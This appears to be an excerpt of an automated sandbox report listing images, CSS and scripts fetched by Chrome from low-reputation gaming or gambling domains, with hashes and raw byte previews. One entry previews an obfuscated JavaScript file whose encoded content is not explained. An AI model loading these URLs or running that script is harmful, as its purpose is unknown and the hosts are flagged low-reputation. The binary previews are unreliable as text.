                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.eda2b3fac, 2021/11/17-17:23:19 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.1 (Windows)" xmpMM:InstanceID="xmp.iid:94057307800311ECA34DC0944C1A890B" xmpMM:DocumentID="xmp.did:94057308800311ECA34DC0944C1A890B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:94057305800311ECA34DC0944C1A890B" stRef:documentID="xmp.did:94057306800311ECA34DC0944C1A890B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>>ad...'XIDATx..{..TU....rWuuWu.M'b..$H.A@%.......a..2..y...1<.....H...sj...9TW.....*........W.KuW..|.....>uZ.e..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):227
                                                                                                                                                          Entropy (8bit):4.64325217917325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:YEm6hUmWE2Y3xoFcNsDWmC9mWFuk72Y33LxrCsJvEIRfA:Bm60ELxoFcN31tHL9rc
                                                                                                                                                          MD5:34BE6641E0DABBA59E9C220BB9658A67
                                                                                                                                                          SHA1:CFAE59F1DC1373226B1AF787B035012D5F11FCD5
                                                                                                                                                          SHA-256:31BB9CE7F929BFC71E37C0C62DD4194C2B6DC5F3B75E19973F84C0BA633814D3
                                                                                                                                                          SHA-512:D5AD3BB399A30626C114861573703A1BDAE7C4F6AE51B8B17DD0595A4BBFC35B19777B6203069272B4C3AB8A682FEDF2BD993550BD4A783B12F0F7E1498F4673
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/themes/base.css
                                                                                                                                                          Preview:.modal{text-align:center}.modal:before{display:inline-block;vertical-align:middle;content:" ";height:100%}.modal-dialog{display:inline-block;text-align:left;vertical-align:middle}.tr-selected-row-color{background-color:#e6f3fc}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):33101
                                                                                                                                                          Entropy (8bit):7.989569678183401
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:GzzcxqllEupEycfJf+jjqjr3q9+0aD7siuZr+:GHcxqTPcfJ2nqa2IZS
                                                                                                                                                          MD5:E20A9BF41FD2CC0D9C3CAB4F451DA768
                                                                                                                                                          SHA1:B02DE43A683B30C76E1BFF8C233993F8B17878D5
                                                                                                                                                          SHA-256:2D82654F6A6F80970BDE13FE2CD35E888A9517BB10B31296DB6C6F21316A1D02
                                                                                                                                                          SHA-512:F76F217415016C346C29EA9C3D4D81F1CB50E83FFB8ED6E3688D12185F801049E3C62BBB0DBA946C249D98761C6004E300AFED090E864F07E8B117480945F064
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.2 (Windows)" xmpMM:InstanceID="xmp.iid:53671BEA93A511ECA210E6E767D0C012" xmpMM:DocumentID="xmp.did:53671BEB93A511ECA210E6E767D0C012"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:53671BE893A511ECA210E6E767D0C012" stRef:documentID="xmp.did:53671BE993A511ECA210E6E767D0C012"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>op?...}.IDATx..}......;>.e.-..%$A...........z......m..A....B.{..u.w......M...&.......a'...9.=.........d.....N..b8....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15093
                                                                                                                                                          Entropy (8bit):7.9524351565226485
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:TpDmpvlG/p2S5debP9KQ3nlAd8LLf2aM77qh1HAdysV:TFA0p2i8A8aaM7eh6dyS
                                                                                                                                                          MD5:46C57C51B8DF1740D25BBABBAADA22A5
                                                                                                                                                          SHA1:AFC3B7126B10FF529F254D0445532E57DF189479
                                                                                                                                                          SHA-256:ABB838D5A5AF338C8A792C810C027E8723AC2499A2D5FD3A69E8FEA5AF5A7101
                                                                                                                                                          SHA-512:F5FD8851D65813989D798F464F50FDBC20B76470189CF7DF26CC3B1B983EC0486CE39C4BD108D315EA02ADE80E307B4133B20BA3E9D211F04C6BCBFF7EC657A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/ag_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:6D4B3F328D5911E7A155C2C7373E56B1" xmpMM:InstanceID="xmp.iid:6D4B3F318D5911E7A155C2C7373E56B1" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):13569
                                                                                                                                                          Entropy (8bit):7.9542641928161375
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:wd2YWEpHwmCOHVTe0wschjx0NQgy3cWShvmHA:wdNF9BCOHVTeDRx0egysXvmg
                                                                                                                                                          MD5:61328DC3D6BBA41D86D4852CDBD80A06
                                                                                                                                                          SHA1:D9FD0CAEDF4CE0B4FD097AEFB3B08FE320F53458
                                                                                                                                                          SHA-256:01160ABD9D13162B1C0E91A286A4A6B3DB263DBFBC96F4A708965DA78C03C471
                                                                                                                                                          SHA-512:ADE51B73B14B4F58240347F36C241418B935E922276ECD1AC059B15FBA73E5CA7A4AB71B9C36DC90A9AADEC46E72AC0E718A770809D3ABB76554D7CA59ADA348
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/pt_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:C17C32078D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:C17C32068D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 334 x 81
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):210346
                                                                                                                                                          Entropy (8bit):7.948556705794593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:ifVTBlF17Qrf3Wa5Xj9QusEWaMPMMduNmfHr3E:ifRBlFcfvj9Dsspn4L3E
                                                                                                                                                          MD5:210F6B5F498D8E9C30555B9D19F540F5
                                                                                                                                                          SHA1:7638694448D8241606C164E0C807E5E34C65007B
                                                                                                                                                          SHA-256:EB0455BBA9B6940E4976117648048CC041427A97D46435B21313375DE8B36066
                                                                                                                                                          SHA-512:5C84A9D6134C7F1BDB4EB42334B38DF2447D175AFCF47B1D76823B9AEE2227C7CE8CBE516682125F3209C89CAB54A580A4C7D111EF7EE59D48CEEE82F2278A85
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89aN.Q.......Ql.i..O$eC.)...".[<..4.aC..izNQ.i..W.........)..%...4m1j.3Lv6..G.[C..9B....{......WuJ..k.....CS.Y..r..s.U92jF8vU..%HrJ.....5..K...7tK.r...[...FyS..1x.R.M...S.e...U.......M&..d..h.....W....a..Gj.D..4.....1.5....f..3.U4.....yd.[..W8.f.Y:..v.....h'tW..Z.y.....s..XV{R.`....f....]..mx.C..e..3..u.d.x..i..T.....f..u#kQBmD.....`..j..W..Z.^<.iO..R..F.....g..w..[..J..p........c..v..F..(..i...E..m..`..W..6....e%..z....E..z.8.....V..V..6....y..A..1{]..g.......i._.....Rz.Z..........BE~_..w.bH.Z..+..[.......G....w..H.U4.....%.."................1mP.pT..+..u.......z.t..j.."..(..O.. ..c...}.K..;+nH.................O..[.....!.....8.Q7.....(.. ...z.@'a7..(k.,....Y4..'..M.....<.t..D..0.....O.."..0..*..Q..}..m.....I..m..q.T6.T7.T7............!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2200), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2200
                                                                                                                                                          Entropy (8bit):5.880542892176317
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VEu8ixe/SZNytKMFmr4GTMfMOGRJ4Y+y2eYWsAQBDjuHybwAYJED:VEu/e/gNy58rrofMOomy6WsAmDjuEhY8
                                                                                                                                                          MD5:9A3C001866C07AA1C23516AF9822A940
                                                                                                                                                          SHA1:B0EF77C1BD097F79B051544DA98E269C21BB48F0
                                                                                                                                                          SHA-256:299B2F83D2397A0D1554CFDC62F96FAB91D301A9B0242A67B872B75C12DA728B
                                                                                                                                                          SHA-512:2BD4E9379D7580B5354C89A7E79F770F4807CCE10552B2C15716D92BC7A6D2A85861F3A9342D318DF9526D8A2DB546DBE42DDF27DECCE22DA12F6C7FCEC2A62C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/sound.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgDYBWAXQBoBvAMwEkAnAdgC5qBXNGAFwEt1Mu5EAEpKAX3IBHAHLSAHqw7c+aAUPJpRAIjZIQAAiRd6PbloDcAeTAArENwB0AExDUeaEAAV6KCCHpcAJ6YIORaAPrhIEgAsihObAA2IFpUAG5QiWwgzACEAAxiwuYZ9Po8ALyqWgAiTgAcwFrC5ChVDqo8LWxVmFr5MBDUzeT0vVrSAJpyliNIFZgomMKY4uTWdtyY9A4AtlAQAOIgXFz+SCvYWrtsZ6laqBxOAGKJUADmWqTCLUsraxt7FxtnsDjFblBeOgLqs9FwAMooJ6vD7MLTwgCiABVwvDLABVaQ1cLPAAyAEFDloilQIG9AopOFDVKJSvouBUACR9ADEXAAFiAALRQNhOPjNBzvE6YfLFLgAMgVXAcdKgwWEEiMvkZyn4rKgZQ53K0fMFIrFEuEUplcvMiuVqtFemWEmlXAAQj5gHp6N5XDwFOwmSpljQUPRMGyOVddigAF73XZIe4oe6gMBwHhcL5CCr5cwgAA8KuSaHeAsLAGoq8IeNQBPyeEgbVwABI8JwuNDeXz+ILSKC7EACbAgb7ufROFAwNjDtBcYT0E5sehodlj0jmZdcVfrtBJRJuk4drsgHs+PwBQKD4e65kCUQ7vfsgD8XCrWlP3a0aKbZ7QalyHdAA1ZseDAHhEmzQIMTSc8uHvUNF0oZ81wEAAfDCtGaT80nAyDoKCGB+SgcsUgkdxsyQ/VKGjCoBWbcxuWnWd50XBx+C0GBoPge4ACpUmDPVVBESgVSQfkUGAclLRQJVchVG4ziVFU1Q1IoSkNfQQAYpsW3dL1pN9f03DkZYND05tyEqRiDJOMCkAgqCYLghCQmKVi5wQhwoC7NyF1JZszg8SMeHIYSH1ELz2OwNBW2/c9eyvAchxHERSFfeLtSwYRmDhLEeGHJFgXi9TyGIfI5QkXJcE1YCT2
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8975
                                                                                                                                                          Entropy (8bit):7.94118009943027
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:oB5uqLc9sTfDDbFu9I326KFNY+7VC10ZoMUSPJ3JEnXsmv6lMSn1oyzpe:oB5uqoyQ9ItKFDVzPJ3JEnXs+6qy1zzw
                                                                                                                                                          MD5:6C807742610F6FADF3A6F2236E144165
                                                                                                                                                          SHA1:995F0F32ADDA484CEC6AF0398CE98C5F84A54D61
                                                                                                                                                          SHA-256:DD322B12013323FFC92960C0566B9F8BFF01E582E5D6AF6C9A001CF1A91EC304
                                                                                                                                                          SHA-512:0176CC44FFFD955028AB214C8F67BF1043ED924DD8EC10752F620A0FAC931F9B45EDFFCB14861EAE7E334EB603AC363239BD279409AF3FCF9E877D94ACDF1DF2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/fish_bg-dx.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:3E56E711D21F11EA85C1CAFB5FB81391" xmpMM:DocumentID="xmp.did:3E56E712D21F11EA85C1CAFB5FB81391"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3E56E70FD21F11EA85C1CAFB5FB81391" stRef:documentID="xmp.did:3E56E710D21F11EA85C1CAFB5FB81391"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>......IDATx...t\...?w...Q/.e.-w.H6.1...L5....B.!........K.$..Ix.^B......6r.eu..]....o....&...r............Z.4..N
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 394 x 713, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):97993
                                                                                                                                                          Entropy (8bit):7.987363689432516
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:1We4mMo1RHFVNUO12IlnN8L5fDnWGiptsZ4fyWcC+Wv1H5de9RoEKZy6OlW1YNIW:1tioHHFVNtFNWVLnOpFfF+adeoEAJ1Kb
                                                                                                                                                          MD5:A531D9AF13969A54A89F6C67E5F441CE
                                                                                                                                                          SHA1:A886B417B679A9AFF24FE3511FEAD468C0EA51A6
                                                                                                                                                          SHA-256:58AB92E35ECC9A70FE742FA3E9668AFA662BDD86587407DD5BCC6F66B06A4576
                                                                                                                                                          SHA-512:8662EA94651500A39D708F0D6D2C25C7D346CBE58753CCB8E43F521D7B9DBF2A2F5C2677730C988C5E807F7539C2AB850BECE5D75224FEE42C928883F22B2451
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR................}....PLTE...@DB7;9263373&,(384.$..#.....".....4*......$)$..................6=7+/+............HIG.........................mikplb.................................................................................................................................................spx............omr...~..jin...wu{.......v|.............{......*$..........{....{|...acg..............{u...........................................v.............mt....bk~.....................S\aqbiuc\..z......[Q7.}....!.....dX@......|hc......'A8i[^QM1|jo...{e...Uau...............PUTB@:....mg...u^.....5KDIHI......mz./23.sq. .....oqcP......yt>TR}hP.....nW_RRm`E.........~|...h[P...95$WKE..v7@P.s./;Cw{q.........~kJ?*BKb...............2?.G<K...<>x..Jl.9Y..Ziw.j....+tRNS.....1).B7Kk.Tw....m"\?b.&..;..e..^.......K..{MIDATx...o.@...B..,..*....nM..V.T...@.OH....e....SUu@..."!eDBL..{...#.w...EjR..w.:ij......]8C-^.~g.v.q5.H..BA.5......]X..t..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 46 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5461
                                                                                                                                                          Entropy (8bit):7.889006070723789
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:S2Lcv5P/QlLZ5eGVcwIYrhS88Jh6LjwuFKaP+XsWFFCSGjXiotM2Ye:Ll9xcwI+klz6XFKehWFFCNB
                                                                                                                                                          MD5:4DFB8214DB94FDA6E86C3A0BCAD8086F
                                                                                                                                                          SHA1:4A729DC54343B1DA813CC1B5834941BF2BAD91A9
                                                                                                                                                          SHA-256:9C51D38AF9670B8C9C74A9A60D266219E052AF09557A4A13343F2E2B586016A2
                                                                                                                                                          SHA-512:EECEF5F07DD6B33B38E3C6A67521D155FBE33C0A51023AA511731F147208C77D1D3D578B415D0EE6A8A0499CD7BBBFA6AC4F6FA9CE9673D2B38AEB118888CA22
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/245/games/bg/bg.png
                                                                                                                                                          Preview:.PNG........IHDR.......(........*....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:B156FB5A7B7911E8A09EAE377C0425CB" xmpMM:DocumentID="xmp.did:B156FB5B7B7911E8A09EAE377C0425CB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B156FB587B7911E8A09EAE377C0425CB" stRef:documentID="xmp.did:B156FB597B7911E8A09EAE377C0425CB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..B....IDATx.Yi.].Y~..s.e...Y=3vf<.c.!q........R.@!..G.....).../...T...T..%)..BR.l..5v.x.=^f..w?...}....M#N...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):9408
                                                                                                                                                          Entropy (8bit):7.940237739170019
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:FboZZ/2/wGnaSErSPm3O7FHofcPMRbkhcAJcvOHSDPLtJ+:RK2YGo+7ccPMR2cAivhDP6
                                                                                                                                                          MD5:8578DAD9FA7FA4E433BB9DEBA9F26E45
                                                                                                                                                          SHA1:04A12C9A176C01E1E422D9094F680717E7EB1123
                                                                                                                                                          SHA-256:42B693986A3726271AB7C76B756B1B985926825B5CD48F6A19D3D60C12904164
                                                                                                                                                          SHA-512:995E9E9CEB24E8CDB7020D412E9A339B10DCA81D650199A9BF5B2C337F69EE81E56BD685527E72F9CE73DE4D0FC6F87EFD3FE6088CC342BD306FF7FD0140D556
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/fish_bg.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:4EF1FD8489F711EAB484DB62618B7FF3" xmpMM:InstanceID="xmp.iid:4EF1FD8389F711EAB484DB62618B7FF3" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:be729f8c-7560-a744-bcd3-b1736b476fc8" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Q,.'.. .IDATx..{wxTe.....%3...RIB.%t
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):36614
                                                                                                                                                          Entropy (8bit):7.990668796429753
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:HeR/46sTQGkpjyrI003N/61uEboqyBBL4ri2hCGiI:HWA6MFkpjnl3N/6gzer
                                                                                                                                                          MD5:212D50254F4155EBAFF6943A76918434
                                                                                                                                                          SHA1:47CE658B628A0B7B0BADD155553D35C9FD13C198
                                                                                                                                                          SHA-256:9EAF7C3D3C73AE2D2FB25DC8769560EADD526196114697033E356798017726DB
                                                                                                                                                          SHA-512:C1C0111D974670944756AC1A2BC35BFEA7657E92B1AFF5841C79427CC115FCC929B2531A7720A7D3901AACF6C294FF65EE531C282BECDD6442F5525013B649D0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.2 (Windows)" xmpMM:InstanceID="xmp.iid:59B45EC493A511EC9D32E57823EC70CE" xmpMM:DocumentID="xmp.did:59B45EC593A511EC9D32E57823EC70CE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:59B45EC293A511EC9D32E57823EC70CE" stRef:documentID="xmp.did:59B45EC393A511EC9D32E57823EC70CE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>g.2...wIDATx..}..U...{..ez..mh#MD. V.5..Fc...ILL1j.....b4... vQ.P@.....0....N..>...3HQ.|.9.......z....4..t.z.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 176 x 183, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):68837
                                                                                                                                                          Entropy (8bit):7.992710479362104
                                                                                                                                                          Encrypted:true
